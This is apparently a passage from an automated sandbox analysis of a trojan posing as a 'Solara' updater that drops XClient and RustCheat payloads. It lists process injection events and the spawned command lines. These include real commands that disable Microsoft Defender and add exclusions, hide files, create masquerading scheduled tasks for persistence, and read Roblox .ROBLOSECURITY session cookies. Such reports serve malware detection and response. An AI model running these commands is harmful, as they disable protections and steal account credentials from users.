Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2188 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2188 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2188 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2188 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2188 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2188 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2188 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2188 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2188 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2188 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2000 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2000 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2000 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2000 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2432 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2432 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2432 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2432 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2432 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2432 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2432 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2432 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2432 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2432 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2556 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2556 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2556 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2556 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2904 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2904 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2904 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2904 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2904 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2904 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2904 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2904 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2904 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2904 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2804 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2804 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2804 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2804 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 3012 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3012 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3012 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 3012 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3012 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 3012 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 1256 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1256 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1256 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 1256 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1256 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1256 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1256 wrote to memory of 1832 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1256 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1256 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1256 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 1832 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1832 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1832 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1832 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 1992 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 1992 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\taskeng.exe

taskeng.exe {AD184026-3B1F-4DEE-8D23-332027688C9C} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Users\Admin\AppData\Roaming\svhost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\hostNet\smss.exe'" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f

C:\hostNet\bridgeblockportComBroker.exe

"C:\hostNet/bridgeblockportComBroker.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\hostNet\smss.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wr50u5fg\wr50u5fg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D4B.tmp" "c:\Users\Admin\AppData\Roaming\CSCB45058D06F694B8593882A1D59855C26.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\noo5nlwe\noo5nlwe.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D89.tmp" "c:\Windows\System32\CSCF6C8047328354985AF527578961D7E65.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\de-DE\taskeng.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

